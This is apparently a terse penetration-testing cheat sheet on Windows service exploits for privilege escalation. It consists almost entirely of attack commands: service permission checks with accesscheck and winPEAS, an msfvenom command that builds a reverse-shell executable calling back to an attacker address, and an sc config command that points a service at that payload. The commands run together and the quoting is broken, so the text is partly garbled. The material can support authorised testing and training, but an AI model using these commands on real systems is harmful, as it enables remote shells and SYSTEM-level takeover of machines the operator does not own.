Service Exploits
.\accesscheck /accepteula -uvqc $SERVICEInsecure Service Properties
.\winPEASany.exe quiet servicesinfo.\accesschck.exe /accepteula -uqvwc $USER $SERVICEsc qc $SERVICEsc query $SERVICEmsfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f exe -o rev.exesc config $SERVICE binpath= "\"C:\Users\$User\Desktop\rev.exe""Unquoted Service Paths
Weak Registry Permissions
Insecure Service Executables
DLL Hijacking
Last updated